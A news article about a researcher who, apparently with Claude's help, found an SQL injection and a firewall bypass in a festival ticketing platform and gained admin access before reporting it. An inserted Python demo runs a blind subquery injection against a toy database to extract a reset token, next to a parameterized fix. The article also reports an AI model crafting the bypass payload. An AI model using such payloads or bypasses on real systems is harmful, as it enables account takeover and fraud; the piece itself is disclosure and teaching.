Hacker exploits Claude AI to score lifetime VIP music festival tickets
Summer is festival season, and tickets to the most coveted events are nearly impossible to get. But what if you could issue extra tickets for yourself, for free? That is what security researcher Ian Carroll has demonstrated.
The ethical hacker recounts how he got into the systems of Front Gate Tickets, a ticketing platform owned by Live Nation, and found that he could issue tickets in bulk. The platform serves some of the largest festivals in the U.S., including Lollapalooza, Bonnaroo, Austin City Limits, Electric Daisy Carnival, and South by Southwest.
"It was great to see a $4,000 ticket and be able to press a button and issue as many as I wanted," he told Wired.
"I could attend all the events without limitations or restrictions; I could get backstage passes or anything they sell to the super VIPs, even if the tickets are sold out," he added.
How did Carroll pull this off? He had an invaluable ally: Anthropic's Claude. With its help he identified an unauthenticated SQL injection flaw in Front Gate's device API.
SQL injection occurs when an application builds database queries by splicing untrusted user input directly into the query text instead of binding it as a parameter; the attacker's input is then executed as part of the query.
Initially the researcher could not get in: the site's web application firewall (WAF) blocked his attempts. That is when he decided to "use a lifeline" and turn to Anthropic's latest model, Claude Opus 4.7.
With the model's help, Carroll found that the firewall inspected only the outer layer of the submitted SQL. By wrapping the malicious query inside a nested subquery, the AI produced a payload that slipped past the protection.
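To make the two paragraphs above concrete, here is an added example (not code from the article, from Carroll, or from Front Gate) showing why string-built queries are injectable, why a keyword filter in front of them is not a fix, and why a parameterized query is. It uses a constructed SQLite schema with invented table names and an invented reset token, and a hypothetical keyword blocklist `naive_waf` standing in for a WAF; the article only says the real WAF inspected the outer layer of the query and was evaded with a nested subquery, so nothing here reproduces its logic or Carroll's actual payload.

```python
import sqlite3

# Constructed toy schema standing in for a ticketing platform's device and
# staff tables. It is NOT Front Gate's real schema, which the article does
# not describe; the reset token value is invented for the demonstration.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE devices (id INTEGER PRIMARY KEY, serial TEXT, venue TEXT)")
    conn.execute("CREATE TABLE staff (id INTEGER PRIMARY KEY, email TEXT, reset_token TEXT)")
    conn.executemany("INSERT INTO devices (serial, venue) VALUES (?, ?)",
                     [("SCN-001", "Venue A"), ("SCN-002", "Venue B")])
    conn.execute("INSERT INTO staff (email, reset_token) VALUES (?, ?)",
                 ("admin@example.com", "tok-abc123"))
    return conn


def lookup_device_vulnerable(conn, serial):
    """VULNERABLE: the caller's input is spliced into the SQL text, so the
    database cannot tell where the developer's query ends and the input begins."""
    sql = f"SELECT serial, venue FROM devices WHERE serial = '{serial}'"
    return conn.execute(sql).fetchall()


def lookup_device_safe(conn, serial):
    """SAFE: the query text is fixed and the value is bound as a parameter;
    quotes and keywords inside it are treated as data, whatever shape they take."""
    sql = "SELECT serial, venue FROM devices WHERE serial = ?"
    return conn.execute(sql, (serial,)).fetchall()


def naive_waf(value):
    """Hypothetical keyword blocklist, used here only to show why pattern
    filters are not a fix. It is not a model of Front Gate's actual WAF."""
    lowered = value.lower()
    return not any(bad in lowered for bad in ("union select", "--", "drop table"))


def oracle_payload(position, candidate):
    """Boolean-blind probe built around a nested subquery: if the token's
    character at `position` equals `candidate`, the WHERE clause becomes true
    for every row; otherwise it matches nothing. None of the blocklisted
    keywords appear in it."""
    return (f"x' OR (SELECT substr(reset_token, {position}, 1) FROM staff LIMIT 1)"
            f" = '{candidate}' OR '1'='2")


def leaks_char(conn, position, candidate):
    """True/False if the vulnerable endpoint leaked the comparison result,
    None if the (hypothetical) filter would have rejected the probe."""
    payload = oracle_payload(position, candidate)
    if not naive_waf(payload):
        return None
    return len(lookup_device_vulnerable(conn, payload)) > 0


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-"


def recover_token_prefix(conn, length):
    """Recover the first `length` characters of the staff reset token one
    character at a time, using only the row-count oracle."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            if leaks_char(conn, pos, ch):
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legit lookup:", lookup_device_vulnerable(db, "SCN-001"))
    print("blocklist stops UNION:", naive_waf("' UNION SELECT email, reset_token FROM staff --"))
    print("subquery probe passes filter:", naive_waf(oracle_payload(1, "t")))
    print("token prefix via vulnerable query:", recover_token_prefix(db, 4))
    print("same probe against parameterised query:", lookup_device_safe(db, oracle_payload(1, "t")))
```

The point of the pairing is that `lookup_device_safe` returns nothing for the probe not because a filter caught it but because the input never becomes SQL; the blocklist, by contrast, stops the obvious `UNION SELECT` shape and lets the subquery probe through, which is enough to read a reset token one character at a time.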
With the firewall bypassed, Carroll could reach a database of more than 500 tables. Among the exposed data were employee login details and live password reset tokens. Using those tokens he obtained administrator privileges on the platform, and from there the rest was straightforward.
That administrative access let him create tickets for any event run through Front Gate, including the premium packages mentioned above.
The researcher's aim was to report the flaw, not profit from it, and he states that he never generated or redeemed any tickets.
"I stopped here and did not review any logs beyond what was necessary to confirm the issue. The point was clear: an unauthenticated request to a scanning API was enough to become an administrator of EDC, Bonnaroo, and any other festival on the platform," he clarified.
He also warned of further risks, such as threat actors redeeming the active password reset tokens to hijack employee and customer accounts.
Carroll reported his findings to Front Gate on April 25, and the company fixed the issue the following day.